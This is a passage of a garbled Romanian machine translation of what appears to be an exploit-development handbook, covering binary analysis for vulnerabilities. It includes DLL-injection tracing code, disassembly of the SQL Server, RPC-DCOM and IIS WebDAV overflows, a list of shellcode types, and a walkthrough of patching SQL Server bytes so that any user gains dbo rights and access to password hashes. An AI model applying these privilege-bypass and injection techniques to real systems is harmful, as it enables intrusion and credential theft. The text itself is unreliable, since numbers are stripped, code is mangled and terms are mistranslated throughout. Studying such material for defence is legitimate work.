„AdjustTokenPrivileges A eșuat* Oxw Dezvoltare VuInT rasă GetLastErrorO): întoarcere(- ), } CloseHandle(token); hProc = OpenProcess(PROCESS ALL ACCESS FALS nProcessId) dacă (hProc == nul) fprintf(stderr „[VTInject]: OpenProcess(^d) a eșuat- W', nProcessId, GetLastErrorO); întoarcere(-l) fprintf(stderr, „[VTInject]- Se încarcă %s în U \n", szDUPath nProcessId); fflush(stdout) dacă ('DetourContinueProcessWithDllA(hProc, szDUPath)) { fprintf(stderr „DetourContinueProcessWithDllOs) a eșuat %d” szDUPath GetLastErrorO) întoarcere(- ) } întoarcere(O); nt mainOnt argc, char **argv) char cale[ ] int plen if(argc'= ) { fprintf(stderr „\n-= VulnTrace =-\n\n" „\tUtilizare %s \n\n" argv[ ]) întoarcere(-l) Capitol trasarea vulnerabilități plen = GetCurrentDirectory(sizeof(path)-l, cale): strncat(cale dllname, (dimensiunea(calea)-plen)-l), if( nject dll(atoi(argv[ ]), cale)) { fprlntftstderr, "Injecţie Eșuat\n") return (-l); } întoarcere(O): }: VulnTrace dll LA Următorul bibliotecă colectate menționat anterior Componente Bibliotecă permite urmări provocări funcții IstrcpynA, folosit al nostru aplicarea Compila a ei în format DLL și implementează în abordare spaţiu vulnerabil programe la Ajutor VTInject /* * VulnTrace srr */ #include "stdafx h" # include #include #include „ocoliri h" DWORD get mem size(car *bloc) { DWORD fnum= memsize= , *frame ptr=NULL *prev frame ptr=NULL, *stack base=NULL, *stack top=NULL asm mov eax dword ptr fs [ ] asm mov stack base eax asm mov eax dword ptr fs [ ] asm mov stivuiește partea de sus, eax asm mov frame ptr ebp dacă( bloc (car *)stack top) pentru(fnum= fnum grămadă top) { - - - prev frame ptr = (DWORD *)*frame ptr f( prev frame ptr stack top) { - - - if(frame ptr = outputend) pauză, } Compilat reprezentare (ecx = ptr, edx = ieșire, ebp- = ceva): mov al, [ecx] Test al, al jz loop end mov [edx]al inc ecx inc ecx cmp edx [ebp+ ] jae loop end jmp loop begin Introducere în binar analiză Pentru simplu ciclu pentru generate asemănătoare Codul; din cauza acest uneori s-a întâmplat imaginea defini, care comanda aplicat în original text Tem nu Mai puțin, funcţionalitate cod mai important a lui proiecta Astfel de cicluri sunt sursă mulți greșeli în aplicatii Cu închis iniţială teh-s gami Constructii intrerupator Echipe intrerupator în asamblator supunere de obicei convertit în suficient complex desene, A compilate Codul arata niste ciudat Structura cod în semnificativ grad depinde din compilator și drăguț specific folosit comenzi intrerupator Comanda intrerupator poate a fi ineficace înlocuit secvenţă din mai multe comenzi dacă; niste compilatoare în individual cazuri exact cârlig și do Uneori comenzi mai simplu sunt citite A analist chiar nu suspecți ce în original text programe în loc de grupuri comenzi dacă a fost ceva in caz contrar Dacă verificabil termeni intrerupator formă secvenţă, compilator de multe ori generează masa tranziții și indici a ei pe administrator variabil intrerupator De multe ori astfel de decizie e diferit înalt eficienţă, dar aceasta nu mereu Poate Mai departe este dată exemplu cod C: int ceva, altele, comuta (some int) { caz other int = pauză, caz altelejnt = pauză, caz altelejnt = treizeci pauză, Mod implicit altelejnt = , pauză, } Compilat reprezentare (unele int = eax, altelejnt = ebx): emp eax, ja default case jmp swi tch jmpjable[eax* ] caz xor ebx, ebx jmp comutator final caz l mov ebx, jmp comutator final caz Capitol şaisprezece Binar analiză mov ebx, treizeci jmp comutator final default case- mov ebx comutator final Masa date switch jmp table este în memorie pe abordare, accesibil' numai pentru citind LA a ei stocate părtinire caz , caz l și caz IDA Pro foarte Bun recunoaște comenzi intrerupator Cu astfel de implementare și exact informează utilizator, care sens administrator variabil corespunde jucărie sau diferit ramuri Dacă valorile intrerupator nu formă secvente lor nu a reusi în mod eficient utilizare pentru indexarea Mese tranziții LA astfel de cazuri compilatoare de multe ori implica desene, în care administrator variabil treptat scade A rezultat comparat co valorile din fix a stabilit Similar implementare permite în mod eficient mâner chiar numeric îndepărtat valorile De exemplu, dacă comanda intrerupator trebuie sa Verifica gestionând variabil pa egalitate valorile , patru, și , aceasta este poate a fi făcut Asa de (EAX — administrator variabil): sub ex jz caz trei dec eax jz case four sub ex jz case seven sub eax, jz caz douăzeci patru jmp Mod implicit Acest proiecta dreapta mânere Toata lumea posibil valorile intrerupator, A la fel tăcut valorile Ea de multe ori aplicat în cod, generate modern compilatoare MSVC++ Analogii funcții memcpy Mulți compilatoare optimiza bibliotecă funcţie memcpy și transforma a ei în simplu trusa asamblator comenzi, lucru mult mai eficient apel funcții Similar operațiuni copierea în memorie de multe ori a se dovedi sursă vulnerabilitati, legate de Cu revărsare tampoane și uşor recunoscut în dezasamblat cod Folosit trusa comenzi arata Asa de: mov es sursă abordare mov ebx, ecx shr ecx / Lungime este împărțit pe patru mov edi, eax // plasament adresa repetă movsd // copierea octeți blocuri mov ecx, ebx și ecx // Marimea rest repetă movsb // copierea rest Introducere în binar analiză LA dat caz date primul copiat octeți blocuri; aceasta este făcut pentru accelerare muncă comenzi repetă movsd Comanda copii ESC -byte-ііх blocuri din ESI în EDI (asa de lungime în Inregistreaza-te ESC este împărțit pe patru) Comanda iere movsb copii rest date Funcţie memset la fel de multe ori optimizat asemănătoare cale — comanda repetă stosd umple memorie simbol, stocate în Inregistreaza-te AL Pentru comenzi memmove asemănătoare optimizare nu aplicat din cauza oportunități etaje regiuni date Analogii funcții strlen Bibliotecă funcţie strlen, Cum și memcpy, de multe ori optimizat niste compilatoare în simplu trusa comenzi asamblator x Similar optimizare la fel elimină cheltuieli pe apel funcții acestea OMS nu stiu Cu cod, generate compilator Codul strlen pe primul vedere poate pare ciudat De obicei el arata aproximativ Asa de: mov edi şir sau ecx Oxffffffff xor eax eax repne crustată nu ecx dec ecx LA rezultat împlinire aceste comenzi lungime linii conservat în Inregistreaza-te ESH Comanda repne crustată scanează linia, dat Inregistreaza-te edi, și caut în a ei simbol din Junior octeți EAX; în dat caz aceasta este zero Pentru toata lumea vizualizate simbol comanda reduce ESC și crește EDI LA Sfârşit operațiuni repne crusta, apoi mânca la descoperire zero octeți Inregistreaza-te EDI indica pe unu simbol pe glonţ octet, A ESC conţine lungime linii Cu verso semn minus După inversarea ESC Cu ulterior scădere în ESC se dovedește corect lungime linii Pe practică pe loc la fel pe echipă nu esx de multe ori ar trebui să comanda sub edi, esx, întorcându-se EDI iniţială sens Trimis constructie poate sa întâlni în orice cod, prelucrare şir date L aceasta este mijloace ce tu trebuie sa recunoaşte a ei și a intelege, Cum ea lucru Constructii C++ Mare parte cod Cu închis iniţială textele în săli de operație sisteme și servere ortografiat pe C++ În mulți relaţii structura acest cod foarte închide la structura simplu Cod C conventii apel foarte închide, A pentru compilatoare Cu a sustine DIN și C++ folosit unu și acea la fel mecanism, generatoare asamblator Codul Tem ne Mai puțin, la analiză cod pe C++ a ei al lor particularități La fel de regulă analiză binar fișiere Cu cod pe C+ + Capitol şaisprezece Binar analiză niste mai dificil analiză cod pe DIN, dar după achizitii niste experienţă special dificultăți ns va fi Indicator acest Indicator acest se referă pe copie clasă, pentru pe cine a fost cauzat actual* schaya funcţie (metodă) Indicator acest ar trebui să fi transmis funcții sfidător parte; subiecte nu Mai puțin, el transmise nu Asa de, Cum comun argumente funcții În loc de acest indicator acest transmise în Inregistreaza-te ESH La acest în cod pe C++ folosit convenţie apel, numit acest apel Exemplu functii, ne-І editorial indicator pe un obiect clasă un alt caracteristici: Apăsaţi edi Apăsaţi esl Apăsaţi [ebp+arg ] lea ecx, [ebx+ Ch] cal ?ParseInput@HTTP HEADERS La fel de vedea indicator conservat în Inregistreaza-te ESC direct față provocare funcții LA dat caz în ESC se dovedește indicator pe un obiect HTTP ANTETURI Deoarece conţinut Inregistreaza-te ESC suficient instabil, indicator acest după apel funcții de multe ori stocate în prieten Inregistreaza-te, dar transmise el aproape mereu în Inregistreaza-te ESH Reconstrucţie definiții clase La analiză cod pe C++ foarte sănătos a intelege structura obiect La colectarea acest informație analist ar trebui să căutare în corect loc; mulți obiecte avea suficient complex structura și conține cuibărit obiecte General o abordare la reconstrucţie obiecte bazat pe căutare toate contestatii relativ indicator pe un obiect, și Prin urmare, pe enumerare membrii acest clasă LA cel mai cazuri tipuri membrii clasă cont pentru ghici sau ieșire logic de, pe uneori a reusi defini, sunt utilizate dacă ei în calitate argumente celebru funcții sau în prieten celebru context Dacă tu încercând reconstrui un obiect manual, începe mai bine Total Cu constructor și distrugător clasă LA aceste funcții produs initializare și distrugere obiecte; Prin urmare, exact în aceste funcții mai des Total întâlni contestatii la cel mai cantitate membrii clasă La fel de regulă constructor și distrugător raport mulți util informație despre clasă, dar departe nu mereu în lor conținea toate necesar informație Poate, pentru formare Mai mult complet reprezentare despre obiect Trebuie să aplica la alții metode clasă Dacă pentru programe disponibil informație simbolic nume, constructor și distrugător sunt foarte uşor - aceasta este funcții Cu nume Nume clase Numele clasei și ClassNameѵ -ClassName (Unde Numele clasei — Nume clasă) Dacă Căutare pe Nume imposibil constructor și distrugător de multe ori a reusi recunoaşte Reconstrucţie definiții clase dar structura Constructorii de obicei uite Cum liniar blocuri cod, inițializarea mare număr membrii structurilor La fel de regulă în lor absent comparatii și condiţional tranziții, dar de multe ori întâlni operațiuni zero membrii structurilor Pentru distrugători caracteristică operațiuni eliberare membrii structurilor Alvar Fulg a scris excelent program, oficializate în formă modul eu DA pro, care beretă pa eu insumi parte "negru muncă" pe enumerare membrii structurilor obiect program poate sa Descarca Cu site-ul pălărie neagră consultanta pe abordare www blackhat com/html/bh-consulting/bh-consulting/bh-consulting- instrumente html Mese virtual funcții Implementarea Mese virtual functii, sau i-mesele, folosit compilatoare creează destul de putine dificultăți la analiză binar fișiere La apel funcții din v-tabele s-a întâmplat suficient greu urmă cale transmitere apel fără adiţional analiză pa etape execuţie De exemplu, Următorul proiecta de multe ori se intalneste în compilate cod pe C++: mov eax, [esi] eu ea ecx, [ebp+var ] Apăsaţi ebx Apăsaţi ecx mov ecx, esi Apăsaţi [ebp+arg O] Apăsaţi [ebp+var ] caii dword ptr [eax+ h] LA ESI stocate indicator pe un obiect, A Control transmise pe index pe funcţie din v-tabele La a sti, Unde va fi transferat Control, necesar stiu structura v-tabele De obicei necesar informație a reusi găsi în constructor clasă LA dat exemplu în constructor prezent Următorul fragment: mov dword ptr [esi], decalaj vtable Pe acest o singura data urmă apel s-a dovedit nu e complicat, dar de multe ori Control transmise pe index pe funcţie din v-tabele cuibărit obiect LA astfel de cazuri o sa ai nevoie în plus muncește din greu Util fapte Mai departe sunt date niste fapte pa primul vedere banal dar Toata lumea egală util și joc cheie rol la binar analiză: despre întors sens funcții transmise în Inregistreaza-te EAX; despre comenzi jl și jg sunt utilizate în simbolic comparații; despre comenzi jb și ja sunt utilizate în nesemnat comparații; despre comanda movx se extinde semn Inregistreaza-te, A comanda movzx completează a lui gloanțe Capitol şaisprezece Binar analiză Manual metode binar analiză Verificat timp metodă citind dezasamblat cod încă ramane extrem eficient mijloace căutare vulnerabilități în binar fișiere Strategie, care alege analist în din timp binar analiză aplicatii, depinde din calitate cod Vedere bibliotecă apeluri Dacă calitate cod suficient scăzut de obicei s-a întâmplat sănătos a incepe Cu căutare simplu greșeli, care în Paşă zile întâlni numai în programe Cu închis iniţială textele A analiza simplu provocări bibliotecă functii, tradiţional considerată problematic; Poate, pentru tine a reusi repede descoperi eroare La număr astfel de funcții raporta strcpy, strcat, stintf și Toata lumea lor derivate sala de operatie sistem Windows conţine mulți soiuri enumerate functii, inclusiv versiuni pentru codificări ASCII și pentru extins codificări De exemplu, la familie strcpy Mai aparține funcții strcpy, LstrcpyA, IstrcpyW, wcscpy și personalizat functii, inclus în Apendice Alte tipic sursă Probleme în Windows este funcţie Multi- ByteToWideChar Şaselea argument funcții defineste marimea recepţioner tampon pentru larg simboluri, dar a lui sens egală cantitate larg simboluri, A nu general mărimea tampon Programatori pe obicei de multe ori transmite în şaselea argument rezultat apel dimensiunea Q Deoarece fiecare larg simbol ia octeți apare potenţial posibilitate scrie în adoptiv tampon de două ori Mai mult date, Cum în limba germana se potrivește LA trecut acest eroare LED la Identificare vulnerabilități în server web Microsoft IIS suspicios cicluri și comenzi înregistrări Dacă analiză simplu apeluri funcții API nu descoperă explicit vulnerabilitati, trebuie sa lua pe normal binar analiză La fel de și la toate restul forme analiză, aceasta este va necesita anumit înţelegere logică aplicatii și studiu relevante secțiuni cod Dacă în aplicarea disponibil evident punct de start punct pentru analiză (sa spunem funcţie prelucrare neverificat date, furnizate atacatori), start Cu a ei și citit Codul mai departe Dacă astfel de puncte Nu, încerca căutare în cod informație referitoare la la specific protocol De exemplu, server web la sintactic analizare intrare cereri Cu mare probabilitate va incepe Cu metodă cerere; Poate, Căutare major metode în binar fişier va da bun pornire punct pentru mai departe analiză niste standard desene depune mărturie despre potenţial periculos cod, care poate conține comenzi revărsare tampon indexate intrare în simbolic matrice: mov [ecx+edx], al Manual metode binar analiză indexate intrare în tampon, situat în local grămadă: mov [ebp+ecx- h] al Înregistrare pe indicator, însoţit crește indicator: mov [edx], topor Inc edx inc edx copierea din tampon, situat sub Control atacator, Cu extensie semn: mov cl, [edx] movx eax, cl Crește sau scădea Inregistreaza-te Cu date, furnizate atacatori (Oportunitati la întreg revărsare): mov eax, [edi] adăuga eh, mier ex jae eroare trunchiere inainte de şaisprezece- sau biți valori: Apăsaţi edi caii strlen adăuga esp patru mov cuvânt ptr [ebp- ] topor După ce am învăţat recunoaşte aceste desene și lor analogi, tu poti găsi larg gamă vulnerabilitati, legate de Cu suprascrierea conţinut memorie Analiză pe Mai mult înalt nivel și joc de inteligență greșeli Cu toate că majoritate vulnerabilitati, detectat în Paşă zile, legate de Cu suprascrierea conţinut memorie, niste defecte nu avea Cu acest nimic general și sunt simplu logic greșeli aplicatii bun exemplu servește defect dubla decodare în iis, descoperit niste varsta înapoi Adevăr, astfel de vulnerabilități foarte greu descoperi binar analiză; din analitice necesar sau noroc, sau foarte bun înţelegere aplicatii Natural, nici unul general metode identificarea astfel de defecte a fi nu poate LA general caz cel mai loial cale este în temeinic studiu cod, care remiză la orice critic resurse pa bază date, furnizate utilizator Pentru căutare asemănătoare greșeli creativ gândire și deschidere nebun de dorit A Aici abundenţă liber timp — neapărat Grafic analiză binar fișiere niste functii, mai ales foarte mare și complex, deveni Mai mult de inteles în grafic formă Pe figura mai bine recunoscut niste complex cicluri, A secțiuni cod Mai tare Cu speria în grafic formă, Cum în liniar Capitol şaisprezece Binar analiză dezasamblator cod IDA Pro poate Genera diagramă (grafic reprezentare) orice functii, în care fiecare nodul este continuu secțiune cod Noduri a lua legatura tranziții sau transfer management, dar performanţă fiecare secțiuni Cum continuu bloc practic garantat Mulți diagrame sunt obținute prea mult mare, și lor incomod naviga pe monitor LA astfel de cazuri mai bine imprimare mai multe pagini copie diagrame pe imprimanta și a analiza a ei pe hârtie In orice caz, grafic mecanism IDA Pro nu dreapta interpretează niste desene, generate compilator De exemplu, în diagramă nu aprinde fragmente cod, generate MSVC++, asa de diagrame Mai a se dovedi incomplet A de multe ori — și inutil Grafic modul pentru IDA pro, scris Alvar Flacom, dreapta mânere astfel de fragmente și construieste deplin diagrame pentru compilate cod MSVC++ Manual decompilare niste funcții nu Mai amenda fi analizat în dezasamblat formă din cauza al lor dimensiuni Alte funcții conține foarte complex ciclic desene, Securitate care nu poate a fi verificat tradiţional binar analiză LA astfel de situatii poate muncă metodă manual decompilare Evident, exacte rezultate decompilare analizate mai simplu, Cum dezasamblat Codul, pe acest precizie Mai mult necesar oferi Nu sens a analiza decompilat Codul Cu greșeli Sănătos complet refuza din orientare pe analiză (dacă aceasta este Poate) și a încerca pur şi simplu recrea reprezentare funcții în formă original text Exemple binar vulnerabilități Considera beton exemple aplicatii binar analiză pentru căutare vulnerabilități Defecte Microsoft SQL Server Două co-autori carti, David Lichfield și Dave Aitel, descoperit rând serios vulnerabilități în Microsoft SQL Server Aceste defecte folosit viermi (în în special slammer) și a avut departe mergând efecte pentru reţea Securitate Scurt studiu major Servicii reţea biblioteci SQL Server, în care ns au fost instalat remedieri, permite repede dezvălui o sursă aceste defecte Vulnerabilitate, descoperit Lichfield este rezultat neverificat apel sptrinf în funcții prelucrare pachete: mov edx, [ebp+var C ] Apăsaţi edx Apăsaţi decalaj aSoftwareMic , „SOFTWAREWMicrosoftWMicrosoft SQL Server" Exemple binar vulnerabilități Apăsaţi decalaj aSSMssqlserverC , „Este^sWMSSQLServerWCurrentVersion” lea eax, [ebp+var ] Apăsaţi eax caii ds sprlntf adăuga mai ales, Oh Variabil var C conţine lot date, citit din retelelor Marimea aceste date poate obține octet, apoi Cum variabil var este de octeți tampon în local grămadă Efecte operațiuni evident și la analiză binar fişier asemănătoare vulnerabilități Bun vizibil Vulnerabilitate SQL Server Buna ziua, descoperit David Aitel, la fel este rezultat neverificat şir operațiuni — în dat caz aceasta este pur şi simplu apel funcții strepy: mov eh, [ebp+arg ] adăuga eh, [ebp+var ] Apăsaţi eax lea ecx [ebp+var ] Apăsaţi ecx caii strepy adăuga esp plasament tampon var ia octet în local grămadă, A iniţială linia pur şi simplu conţine date pachet La fel de aceasta este de multe ori s-a întâmplat, astfel de elementar greșeli mai lung persista în programe Cu închis iniţială texte, disponibil numai în binar formă Vulnerabilitate LSD RPC-DCOM Din nefericire celebru și larg folosit vulnerabilitate, descoperit grup LSD (Ultimul Etape de Dclirium) în interfețe RPC-DCOM, a devenit rezultat neverificabil ciclu copierea linii la alocare nume servere din moduri în format UNC Următorul ciclu copierea în memorie, situat în bibliotecă rcpss dll, este evident amenințare pentru Securitate mov Oh, [eax+ ] emp Oh, „V jz mic de statura os AE sub edx, esx IOC- AE mov [esh], Oh Inc esx ts esx mov topor [ecx+edx] pagină Oh '\' jnz mic de statura os AE șir UNC dat în format \\server\resursa\cale și transmise în codificare Cu larg simboluri LED ciclu dor primul patru octeți (simboluri \\) și copii date în adoptiv tampon pâna la inainte de detectare final verso bară oblică (simbol \), fără orice verificări erori Similar ciclic desene de multe ori sunt sursă vulnerabilitati, legate de Cu suprascrierea conţinut zdrobi Capitol şaisprezece Binar analiză Vulnerabilitate IIS webdav Vulnerabilitate IIS webdav, publicat în Microsoft Securitate Buletin MS - , a fost identificat nu analisti, lucru în zone Securitate, A atacatori Vulnerabilitate a devenit rezultat pe biți întreg revărsare, de multe ori întâlnire în şir funcții de bază biblioteci Windows timp execuţie LA funcții sunt utilizate tipuri şir date rtl- InitUnicodeString și RtllnitAnsiString Cu camp lungime, care este tu pe biți număr fără semn Dacă transfer către astfel de funcții linia, lungime care depaseste simboluri, întâmpla revărsare Vulnerabilitate IIS webdav apare în rezultat transmitere RtlDosPathNameToNtPathName U linii lung peste KB; aceasta este Oportunitati la la asta ce foarte lung linia Are mic sens câmpuri mărimea Acest suficient nebanală eroare, și mai repede Total, ea a fost identificat nu binar analiză, A alții metode Tem nu Mai puțin, la disponibilitate experienţă și liber timp tu învăța găsi asemănătoare erori De bază structura date linii ANSI sau Unicode arata Asa de: typedef struct UNICODE STRING { nesemnat mic de statura lungime, nesemnat mic de statura lungime maxima wchar *date, Vulnerabilitate va fi creat Următorul fragment cod RtllnitUnicodeString: mov edi, [esp+arg patru] mov edx [esp+arg O] mov dword ptr [edx] mov [edx+ ], edi sau edi edi JZ mic de statura loc F C sau ecx OFFFFFFFFh xor eax, eax repne scsw nu ecx shl ecx mov [edx+ ], cx // Posibil trunchiere dec ecx dec ecx mov [edx], cx // Posibil trunchiere Lungime linii Cu larg simboluri determinat echipă repne scasw, se inmulteste pe , A rezultat conservat în pe biți camp structurilor Interior functii, cauzat RtLDosPathNameToNtPathName U, se intalneste Următorul Codul: mov dx [ebp+var ] movzx esi dx mov eax, [ebp+var ] lea ecx [eax+esi] mov [ebp+var] C] ecx Rezultate cmp esx, [ebp+arg ] jnb loc F E LA acest caz var — un alt lungime linia, A var — structura UNICODE ŞIR Cu date atacator, conținând trunchiată pe biți camp lungime Dacă sumă Două lungimi linii mai mica arg (lungime recepţioner tampon în grămadă), Două linii copiat în tampon Deoarece marimea unu din linii mult depaseste volum rezervat spaţiu în grămadă, merge mai departe revărsare Ciclu copierea personaje arata suficient standard și uşor recunoscut: mov [ecx], dx adăuga ecx ebx mov [ebp+var ] ebx adăuga [ebp+var] ], ebx loc F AE E mov edx, [ebp+var ] mov dx, [edx] Test dx, dx JZ mic de statura loc F AE cmp dx, topor JZ mic de statura loc F AE cmp dx, '/' JZ mic de statura loc F AE cmp dx ' ' jnz mic de statura loc F AE jmp loc F B F Linia copiat în adoptiv tampon pâna la inainte de detectare puncte ( ), bară oblică (/) sau zero octeți Cu toate că acest beton vulnerabilitate LED la înregistrări pe direcţie la top grămadă și de urgență completare software curgere, înlocuire indicator pe manipulator excepții SEH permis organiza performanţă arbitrar cod Rezultate LA produse Cu închis iniţială textele continua întâlni mulți vulnerabilități pentru o lungă perioadă de timp a dispărut în zone deschis textele Mulți vulnerabilități astfel de drăguț cere binar analiză, în apoi timp Cum majoritate programe sunt limitate superficial testarea sau necomplicat fuzz, asa de vulnerabilități rămâne neobservat Cu toate că binar analiză conjugat Cu adiţional muncă, acest proces nu prea mult mai dificil analiză iniţială textele Doar el cere adiţional timp Treptat cel mai evident vulnerabilități Vino la lumina fuzzing și lichidat în comercial programe dar pentru înlătura Mai mult subţire defecte cont pentru studiu în profunzime binar analiză Asa de timp binar analiză o sa primeasca astfel de la fel Răspândire, Cum analiză iniţială textele — fără îndoială în acest zone Mai mult necesar mult do Parte IV Adiţional materiale Carte a fost ar incomplet fără materiale Mai mult înalt nivel LA capitol prezentat nou strategii utilizare implementate cod, care permite do mulți Mai mult, Cum pur şi simplu alerga privilegiat comanda CPU Printre îmbunătățită strategii aplicatii implementate cod poate sa marcă la distanta blocare management acces în lucru program forta gata exploata muncă în real conditii, in afara complet controlat lucru mediu inconjurator, s-a întâmplat nu este usor chiar se abil hacker LA capitol optsprezece prezentat niste util aptitudini, necesar pentru acest Mai departe în capitol nouăsprezece considerată temă atacuri pe beton relaționale DBMS, astfel de Cum oracol, DB și SQL Server Dacă a lua în considerare, ce pe mulți servere lucru numai unu de bază Apendice, cunoştinţe vulnerabilități SGBD poate se dovedesc a fi nu Mai puțin util, Cum cunoştinţe vulnerabilități de bază sala de operatie sisteme LA completare cărți considerată relativ nou fenomen — vulnerabilități miezuri LA capitole și prezentat metode identificarea și exploatare vulnerabilități nuclee în săli de operație sisteme OpenBSD și solaris CAPITOL Alternativă strategii La vizionare arhive implementate cod mai des Total întâlni variatii pe niste major subiecte (în dependențe din sala de operatie sisteme) despre Unix: • execve /bin/sh; • legare la porturi /bin/sh; • pasiv conexiune /bin/sh; • setuid; • încălcare rădăcină despre Windows: • winexec; • pasiv conexiune Cu folosind CreateProcess cmd exe LA acest listă prezentat principal tipuri implementate cod, informație despre care mai des Total publicat în liste lista de e-mail-uri și pa site-uri web, dedicat subiect Securitate Exista destul de putine factori complicându-se dezvoltare tradiţional implementate cod, dar timp din timp apărea situatii în care necesar do ceva non-standard — Poate, deoarece ce obiective poate sa a ajunge Mai mult direct de, sau niste de protecţie mecanism blocuri tradiţional implementate Codul sau pur şi simplu deoarece, ce tu prefera Mai mult interesant n non-standard metode Tradiţional implementate Codul în acest capitol nu este luată în considerare În loc de acest noi hai sa ne concentram pa nebanală și neobișnuit aspecte împlinire arbitrar cod în ţintă proces — sa spunem pe modificări cod proces în timp a lui execuţie, pa direct manipulare Cu sala de operatie sistem pentru adaosuri utilizatorii sau schimbări configuratii, pe ascuns transfer informație Cu ţintă gazdă Aici la fel prezentat niste util trucuri pe muncă Cu implementate cod, în Mai ales pentru platforme ferestre, astfel de, Cum reducere volum implementate cod, decizie Probleme Cu actualizări Serviciu Rusk și independenţă din versiuni Capitol Anyornaivnye strategii Modificare programe Dacă ţintă program suficient complicat în loc de simplu întoarcere comanda procesor uneori s-a întâmplat mai sanatos paraliza a ei sistem Securitate De exemplu, la atac pe Server bazele date atacator de obicei interesat informație Din comanda procesor special sens nu va fi, deoarece ce necesar inteligenţă ascuns undeva în imens fișiere date, care Mai se dovedesc a fi inaccesibil (deoarece ce proces SGBD instalat pentru lor monopol blocare) DIN un alt mână, la disponibilitate necesar privilegii date Mai a fi uşor recuperat interogări SQL LA astfel de situatii mai bine profită editare cod pe etape a lui execuţie LA a lui articol „Încălcare Bază de date Securitate Mecanisme» (www nextgenss com/ documente/violating database security pdf) Chris Anly descris octeți "plasture" pentru SGBD Microsoft SQL, care de fapt prevede Pentru fiecare utilizator privilegiu dbo, apoi mânca proprietar bazele date (analogic privilegiat utilizator Cu drepturi rădăcină pentru bazele date) Plasture instalat tradiţional revărsare tampon sau atac format linii — noi considera exemplu, redus în articol, la tu primit despre limba germana reprezentare interesant particularitate petice este în volum, ce ea la fel de uşor aplicat Cum pentru modificări binar fişier pe disc, Asa de și pentru modificări lucru proces în memorie DIN puncte viziune atacator defect editări binar fişier include în volum, ce ea mai simplu e gasit (antivirus scanere, mecanisme verificări integritate fișiere tip tripwire și t d ) La fel cheltuieli tine minte, ce atacuri astfel de drăguț de multe ori aplica la organizatii "negru mutare" pentru un alt, Mai mult puternic reţea atacuri octeți modificare SQL Server Al nostru poartă — găsi cale paraliza mecanism management acces la baza date, la după acest a trecut orice încercări citind sau înregistrări arbitrar câmpuri Mese Desigur, conduce static analiză toate cod bazele SQL Server ireal Mic sesiune preliminar depanare A arăta ne corect direcţie Pentru start o sa ai nevoie Anchetă, care activează necesar mecanisme Securitate Atentat, încercare împlinire Următorul cerere se termină ghinion dacă utilizator nu este sistemică administrator: Selectați parola din sysxlogins prin urmare noi lansa Qucry Analizor (utilitate, sosit în livra SQL Server) și depanator, și a executa Anchetă în calitate neprivilegiat utilizator Pe ecran apare dialog fereastră Cu informație despre excepție Microsoft Vizual C++ Închidere fereastră, noi alege Depanare/Go și încredinţa octeți modificare SQL Server prelucrare excepții SQL Server întorcându-se la Interogare analizor, noi vedea mesaj despre eroare: SELECTAȚI permisiune Denled pe obiect „sysxloglns”, Bază de date 'maestru' proprietar ' dbo' Doar din curiozitate noi încercat alerga Anchetă în calitate utilizare sa Excepții nu a avut loc Evident, mecanism management acces initiaza excepție C++, când utilizator negat în acces la masa Acest fapt se va simplifica proces reconstrucţie /(Mai mult noi sa incercam a analiza Codul și găsi punct, în care program decide trebuie sa iniţia excepție sau Nu Căutare cont pentru îndeplini metodă mostre și greșeli, dar după mai multe fără succes încercări noi descoperi ca urmare a: E F E caii FHasObjPermisslons ( b) La absenta necesar permisiuni Control transmise echipă D E AF E FF caii ex ra se ( s ) NOTĂ - - LA dat caz la ne disponibil informație despre simbolic nume acordat Microsoft în formă fişier sqlserver pdb aceasta este rar luxos Natural, Aici important Codul funcții FHasObjPermissions Analizand a ei, noi găsim: BB E O/ F E FF caii ExecutionContext Uld ( a ) C D cmp topor decalaj FHasObjPermiss ons+ B h ( c ) C DIN AC C DACĂ jne FHasObjPermissions+ C h ( f ) Aici efectuat următoarele actiuni: despre primind identificator utilizator (U D); despre comparaţie UID Cu x ; despre dacă sens Grozav din x , tranziție (după adiţional cecuri) la cod, generatoare excepție rezonabil presupune ce identificator utilizator Are special sens Următorul Anchetă la masa utilizatorii de sistem spectacole ce UID corespunde proprietar bazele date (dbo): Selectați ★ din utilizatorii de sistem Din documentație SQL Server (http://doc ddart net/mssql/sql /html/setupsql/ad security qyh htm) noi învăța ca urmare a: subînțeles ce utilizator dbo are permisiuni pe performanţă orice operațiuni Cu baza date Oricine participant fix roluri administrator de sistem, lucru Cu baza date, în fiecare baza date a pune în conformitate special utilizator dbo Cu exceptia A merge, orice un obiect, creată orice participant fix roluri administrator de sistem, automat aparține dbo Natural, noi vrei avea moravuri UID Minion asamblator "plasture" uşor va oferi necesar privilegiu Capitol Alternativă strategii La vizionare cod ExecutionContext::UID se dovedește ce standard secvenţă împlinire cod arata suficient simplu: ?U d@Executi onContext@@AEFXZ A Apăsaţi esi А V F mov esi ecx A V mov eax dword ptr [esl] А V mov eax dword ptr [eax+ h] A C ASA DE Test eax eax A E F E je Execuţie onContext Ui d+OCh ( d ) A V D B SA mov ecx dword ptr [ tis index( a b )] A A V C mov edx dword ptr fs*[ Ch] A V OS A mov ecx dword ptr [edx+ecx* ] А emp dword ptr [ecx+ ],esi А F V jne ExecutionContext::Uid+ Ah ( d ) A D F Test octet ptr [eax+ ] l in absenta je ExecutionContext Uid+ Bh ( a d) A V mov eax dword ptr [esi] А V mov eax dword ptr [eax+ h] А F Test octet ptr [eax+ ] l A C F A je ExecutionContext••Uid+ h ( fc) А V mov eax dword ptr [esi] A V mov eax dword ptr [eax+ h] А V mov cuvânt topor ptr [eax+ ] А В E pop esi A C NV ret Ne interesat linia A V mov cuvânt topor ptr [eax+ ] Aici în Inregistreaza-te OH a intrat al nostru "magie" Codul UID Asa de, tine minte: noi descoperit în FHasObjPermissions Codul apel funcții ExecutionContext::UID, în care greu codificat identificator UID furnizate special nivel acces Noi Poate sa do Asa de, la orice utilizator posedat UID , înlocuind şir А V mov cuvânt topor ptr [eax+ ] Acest linia este înlocuit nou comanda: А V mov ax offset ExecutionContext- Uid+ h ( a ) De fapt dat comanda este echivalent cu echipă mov ah, La verificare rezultat modificări devine evident, ce orice utilizator acum poate a executa comanda Selectați parola din sysxlogins De extrem cel mai puţin acest modificare prevede nelimitat acces la hash parole, A prin urmare (Cu aplicarea utilitati selecţie parole) — la parolele toate contabilitate înregistrări în baza La verificare acces la alții Mese se dovedește ce noi acum Poate sa legume şi fructe probă, introduce, Actualizați și îndepărtare din orice Mese bazele date Și pentru acest a luat Schimbare Total octeți cod SQL Server! Asa de, noi considerată logică muncă petice Acum necesar scrie program, care ar contribuit schimbări, nu provocând erori LA SQL Server -locuri modificare SQL Server cunoscut întreg rând Opțiuni revărsare Cu oportunitate împlinire arbitrar cod și defecte 